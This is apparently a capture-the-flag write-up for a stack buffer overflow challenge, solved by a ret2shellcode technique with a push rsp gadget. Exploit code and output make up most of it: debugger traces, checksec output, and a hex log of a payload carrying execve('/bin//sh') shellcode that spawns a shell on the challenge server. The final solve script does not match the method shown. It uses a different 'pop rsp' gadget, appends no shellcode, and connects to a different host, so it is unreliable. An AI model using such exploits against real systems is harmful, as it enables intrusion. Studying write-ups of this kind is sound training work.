Blast From The Past

Ret2Shellcode + push rsp gadget

Analysis

We are given a binary and the source challenge.c where we can spot a buffer overflow in scanf

#include <stdio.h>
#include <string.h>

void ignore_me() {
        setbuf(stdin, 0);
        setbuf(stdout, 0);
}

void pew_pew_90s() {
    printf("🔫 *pew pew* Retro laser gun fires! But it's still just a cat toy from the 90s...\n");
}

int main() {

        ignore_me();

    char retro_cat[32];
        int ver = 50004;
    
    printf("🕹  BLAST TO THE PAST - Cyber Cat Defense %d! 🐱💾\n", ver);
    printf("Enter your retro cyber-cat's name, dude: ");
    // Takes in 320 character to a 32 byte buffer
    scanf("%320s", retro_cat);
    
    printf("Radical! %s is locked and loaded with a sweet laser gun!\n", retro_cat);
    pew_pew_90s();
    
    return 0;
}

Using pwndbg's cyclic, we can easily determine the offset to gain control of our instruction pointer (RIP), which is 56.

pwndbg> cyclic 100
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa                                                          
pwndbg> r                                                                                                                                                                   
Starting program: /home/kali/Desktop/CTF-New/greywelcome/dist-blast_from_the_past/challenge_patched                                                                                          
[Thread debugging using libthread_db enabled]                                                                                                                                                
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".                                                                                                                   
🕹  BLAST TO THE PAST - Cyber Cat Defense 50004! 🐱💾
Enter your retro cyber-cat's name, dude: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
Radical! aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa is locked and loaded with a sweet laser gun!
🔫 *pew pew* Retro laser gun fires! But it's still just a cat toy from the 90s...

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401273 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────────────────────
 RAX  0
 RBX  0x7fffffffdad8 —▸ 0x7fffffffdeb8 ◂— '/home/kali/Desktop/CTF-New/greywelcome/dist-blast_from_the_past/challenge_patched'
 RCX  0x7ffff7eaf936 (write+22) ◂— add rsp, 0x18
 RDX  0
 RDI  0x7ffff7f947b0 (_IO_stdfile_1_lock) ◂— 0
 RSI  0x7ffff7f93643 (_IO_2_1_stdout_+131) ◂— 0xf947b0000000000a /* '\n' */
 R8   0
 R9   0
 R10  0
 R11  0x202
 R12  0
 R13  0x7fffffffdae8 —▸ 0x7fffffffdf0a ◂— 'COLORFGBG=15;0'
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 ◂— 0
 R15  0x403e18 (__do_global_dtors_aux_fini_array_entry) —▸ 0x401160 (__do_global_dtors_aux) ◂— endbr64 
 RBP  0x6161616161616167 ('gaaaaaaa')
 RSP  0x7fffffffd9c8 ◂— 'haaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa'
 RIP  0x401273 (main+144) ◂— ret 
────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────
 ► 0x401273 <main+144>    ret                                <0x6161616161616168>
    ↓









──────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd9c8 ◂— 'haaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa'
01:0008│     0x7fffffffd9d0 ◂— 'iaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa'
02:0010│     0x7fffffffd9d8 ◂— 'jaaaaaaakaaaaaaalaaaaaaamaaa'
03:0018│     0x7fffffffd9e0 ◂— 'kaaaaaaalaaaaaaamaaa'
04:0020│     0x7fffffffd9e8 ◂— 'laaaaaaamaaa'
05:0028│     0x7fffffffd9f0 ◂— 0x7f006161616d /* 'maaa' */
06:0030│     0x7fffffffd9f8 ◂— 0x71eee8d7e30b6ed1
07:0038│     0x7fffffffda00 ◂— 0
────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────
 ► 0         0x401273 main+144
   1 0x6161616161616168 None
   2 0x6161616161616169 None
   3 0x616161616161616a None
   4 0x616161616161616b None
   5 0x616161616161616c None
   6   0x7f006161616d None
   7 0x71eee8d7e30b6ed1 None
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6161616161616168
Finding cyclic pattern of 8 bytes: b'haaaaaaa' (hex: 0x6861616161616161)
Found at offset 56

As the challenge description suggests, no protections exist for this binary, allow executable stack which can be verified with checksec. This allows us to execute code or instructions on the stack, allowing us to perform ret2shellcode

pwndbg> checksec
File:     /home/kali/Desktop/CTF-New/greywelcome/dist-blast_from_the_past/challenge_patched
Arch:     amd64
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX unknown - GNU_STACK missing
PIE:        No PIE (0x400000)
Stack:      Executable
RWX:        Has RWX segments
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

We can just search for any x64 linux shellcode online or opt to use pwntool's shellcraft function.

However, we need to somehow redirect execution to the start of our shellcode which is where the RSP register comes in.

RSP points to the top of your stack and by using a gadget like push rsp; ret, it pushes RSP's current value onto the stack before redirecting execution flow through ret.

So putting all the pieces together we need to:

Buffer Overflow till we gain control over RIP
Execute the gadget push rsp; ret to redirect execution to our shellcode which is placed after the gadget on the stack
Shellcode execution happens because ret jumps to the address that was pushed (the old RSP value)

You can see this using pwndbg and setting a breakpoint at the end of main

pwndbg debugging

RSP  0x7ffda5d9e5c8 —▸ 0x4011fc (main+25) ◂— push rsp
*RIP  0x401273 (main+144) ◂— ret 
───────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────
 ► 0x401273       <main+144>    ret                                <main+25>
    ↓
   0x4011fc       <main+25>     push   rsp
   0x4011fd       <main+26>     ret                                <0x7ffda5d9e5d0>
    ↓
   0x7ffda5d9e5d0               xor    rsi, rsi                    RSI => 0
   0x7ffda5d9e5d3               push   rsi
   0x7ffda5d9e5d4               movabs rdi, 0x68732f2f6e69622f     RDI => 0x68732f2f6e69622f ('/bin//sh')
   0x7ffda5d9e5de               push   rdi
   0x7ffda5d9e5df               push   rsp
   0x7ffda5d9e5e0               pop    rdi                         RDI => 0x7ffda5d9e5c0
   0x7ffda5d9e5e1               push   0x3b
   0x7ffda5d9e5e3               pop    rax                         RAX => 59
─────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffda5d9e5c8 —▸ 0x4011fc (main+25) ◂— push rsp
01:0008│     0x7ffda5d9e5d0 ◂— 0x622fbf4856f63148
02:0010│     0x7ffda5d9e5d8 ◂— 0x545768732f2f6e69 ('in//shWT')
03:0018│     0x7ffda5d9e5e0 ◂— 0x50f99583b6a5f
04:0020│     0x7ffda5d9e5e8 —▸ 0x7ffda5d9e6d8 —▸ 0x7ffda5d9ef8a ◂— './challenge_patched'
05:0028│     0x7ffda5d9e5f0 —▸ 0x7ffda5d9e6d8 —▸ 0x7ffda5d9ef8a ◂— './challenge_patched'
06:0030│     0x7ffda5d9e5f8 ◂— 0x666545f2fe5f2c98
07:0038│     0x7ffda5d9e600 ◂— 0
───────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────
 ► 0         0x401273 main+144
   1         0x4011fc main+25
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
<snip>
pwndbg> s
0x00000000004011fc in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
*RSP  0x7ffda5d9e5c8 —▸ 0x7ffda5d9e5d0 ◂— 0x622fbf4856f63148
*RIP  0x4011fd (main+26) ◂— ret 
─────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────
   0x401273       <main+144>    ret                                <main+25>
    ↓
   0x4011fc       <main+25>     push   rsp
 ► 0x4011fd       <main+26>     ret                                <0x7ffda5d9e5d0>
    ↓
   0x7ffda5d9e5d0               xor    rsi, rsi                    RSI => 0
   0x7ffda5d9e5d3               push   rsi
   0x7ffda5d9e5d4               movabs rdi, 0x68732f2f6e69622f     RDI => 0x68732f2f6e69622f ('/bin//sh')
   0x7ffda5d9e5de               push   rdi
   0x7ffda5d9e5df               push   rsp
   0x7ffda5d9e5e0               pop    rdi                         RDI => 0x7ffda5d9e5c0
   0x7ffda5d9e5e1               push   0x3b
   0x7ffda5d9e5e3               pop    rax                         RAX => 59
───────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffda5d9e5c8 —▸ 0x7ffda5d9e5d0 ◂— 0x622fbf4856f63148
01:0008│     0x7ffda5d9e5d0 ◂— 0x622fbf4856f63148
02:0010│     0x7ffda5d9e5d8 ◂— 0x545768732f2f6e69 ('in//shWT')
03:0018│     0x7ffda5d9e5e0 ◂— 0x50f99583b6a5f
04:0020│     0x7ffda5d9e5e8 —▸ 0x7ffda5d9e6d8 —▸ 0x7ffda5d9ef8a ◂— './challenge_patched'
05:0028│     0x7ffda5d9e5f0 —▸ 0x7ffda5d9e6d8 —▸ 0x7ffda5d9ef8a ◂— './challenge_patched'
06:0030│     0x7ffda5d9e5f8 ◂— 0x666545f2fe5f2c98
07:0038│     0x7ffda5d9e600 ◂— 0
<snip>
*RSP  0x7ffda5d9e5d0 ◂— 0x622fbf4856f63148
*RIP  0x7ffda5d9e5d0 ◂— 0x622fbf4856f63148
─────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────
   0x401273       <main+144>    ret                                <main+25>
    ↓
   0x4011fc       <main+25>     push   rsp
   0x4011fd       <main+26>     ret                                <0x7ffda5d9e5d0>
    ↓
 ► 0x7ffda5d9e5d0               xor    rsi, rsi                    RSI => 0
   0x7ffda5d9e5d3               push   rsi
   0x7ffda5d9e5d4               movabs rdi, 0x68732f2f6e69622f     RDI => 0x68732f2f6e69622f ('/bin//sh')
   0x7ffda5d9e5de               push   rdi
   0x7ffda5d9e5df               push   rsp
   0x7ffda5d9e5e0               pop    rdi                         RDI => 0x7ffda5d9e5c0
   0x7ffda5d9e5e1               push   0x3b
   0x7ffda5d9e5e3               pop    rax                         RAX => 59
───────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp rip 0x7ffda5d9e5d0 ◂— 0x622fbf4856f63148
01:0008│         0x7ffda5d9e5d8 ◂— 0x545768732f2f6e69 ('in//shWT')
02:0010│         0x7ffda5d9e5e0 ◂— 0x50f99583b6a5f
03:0018│         0x7ffda5d9e5e8 —▸ 0x7ffda5d9e6d8 —▸ 0x7ffda5d9ef8a ◂— './challenge_patched'
04:0020│         0x7ffda5d9e5f0 —▸ 0x7ffda5d9e6d8 —▸ 0x7ffda5d9ef8a ◂— './challenge_patched'
05:0028│         0x7ffda5d9e5f8 ◂— 0x666545f2fe5f2c98
06:0030│         0x7ffda5d9e600 ◂— 0
07:0038│         0x7ffda5d9e608 —▸ 0x7ffda5d9e6e8 —▸ 0x7ffda5d9ef9e ◂— 'COLORFGBG=15;0'

With that we get the flag!

python3 solve.py
[*] '/home/kali/Desktop/CTF-New/greywelcome/dist-blast_from_the_past/challenge_patched'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Opening connection to challs.nusgreyhats.org on port 35123: Done
[DEBUG] Received 0x68 bytes:
    00000000  f0 9f 95 b9  ef b8 8f 20  20 42 4c 41  53 54 20 54  │····│··· │ BLA│ST T│
    00000010  4f 20 54 48  45 20 50 41  53 54 20 2d  20 43 79 62  │O TH│E PA│ST -│ Cyb│
    00000020  65 72 20 43  61 74 20 44  65 66 65 6e  73 65 20 35  │er C│at D│efen│se 5│
    00000030  30 30 30 34  21 20 f0 9f  90 b1 f0 9f  92 be 0a 45  │0004│! ··│····│···E│
    00000040  6e 74 65 72  20 79 6f 75  72 20 72 65  74 72 6f 20  │nter│ you│r re│tro │
    00000050  63 79 62 65  72 2d 63 61  74 27 73 20  6e 61 6d 65  │cybe│r-ca│t's │name│
    00000060  2c 20 64 75  64 65 3a 20                            │, du│de: │
    00000068
[DEBUG] Sent 0x58 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000030  41 41 41 41  41 41 41 41  fc 11 40 00  00 00 00 00  │AAAA│AAAA│··@·│····│
    00000040  48 31 f6 56  48 bf 2f 62  69 6e 2f 2f  73 68 57 54  │H1·V│H·/b│in//│shWT│
    00000050  5f 6a 3b 58  99 0f 05 0a                            │_j;X│····│
    00000058
[*] Switching to interactive mode
 [DEBUG] Received 0xc6 bytes:
    00000000  52 61 64 69  63 61 6c 21  20 41 41 41  41 41 41 41  │Radi│cal!│ AAA│AAAA│
    00000010  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000040  41 fc 11 40  20 69 73 20  6c 6f 63 6b  65 64 20 61  │A··@│ is │lock│ed a│
    00000050  6e 64 20 6c  6f 61 64 65  64 20 77 69  74 68 20 61  │nd l│oade│d wi│th a│
    00000060  20 73 77 65  65 74 20 6c  61 73 65 72  20 67 75 6e  │ swe│et l│aser│ gun│
    00000070  21 0a f0 9f  94 ab 20 2a  70 65 77 20  70 65 77 2a  │!···│·· *│pew │pew*│
    00000080  20 52 65 74  72 6f 20 6c  61 73 65 72  20 67 75 6e  │ Ret│ro l│aser│ gun│
    00000090  20 66 69 72  65 73 21 20  42 75 74 20  69 74 27 73  │ fir│es! │But │it's│
    000000a0  20 73 74 69  6c 6c 20 6a  75 73 74 20  61 20 63 61  │ sti│ll j│ust │a ca│
    000000b0  74 20 74 6f  79 20 66 72  6f 6d 20 74  68 65 20 39  │t to│y fr│om t│he 9│
    000000c0  30 73 2e 2e  2e 0a                                  │0s..│.·│
    000000c6
Radical! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xfc\x11@ is locked and loaded with a sweet laser gun!
🔫 *pew pew* Retro laser gun fires! But it's still just a cat toy from the 90s...
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0xd bytes:
    b'flag.txt\n'
    b'run\n'
flag.txt
run
$ cat flag.txt
[DEBUG] Sent 0xd bytes:
    b'cat flag.txt\n'
[DEBUG] Received 0x2a bytes:
    b'grey{traditional_ret2shellcode_exploits!}\n'
grey{traditional_ret2shellcode_exploits!}

Solve Script

from pwn import *

elf = context.binary = ELF("./challenge_patched")
libc = elf.libc

context.binary = elf
context.log_level = 'debug'

if args.REMOTE:
        p = remote("172.31.1.2", 11100)
else:
        p = elf.process()

sla = lambda a, b: p.sendlineafter(a, b)
sa = lambda a, b: p.sendafter(a, b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
rl = lambda: p.recvline()
ru = lambda a: p.recvuntil(a)

pop_rsp =  0x00000000004011b6  # pop rsp; ret;
offset = 56
payload = b'A' * offset
payload += p64(pop_rsp)  # Overwrite RSP to control stack pointer
## gdb.attach(p, gdbscript='''b *main+144''')
p.recvuntil(b'dude:')
p.sendline(payload)
p.interactive()

PreviousGreyhats Welcome CTF 25 NextEchoCrash

Last updated 6 months ago

hashtagAnalysis

Analysis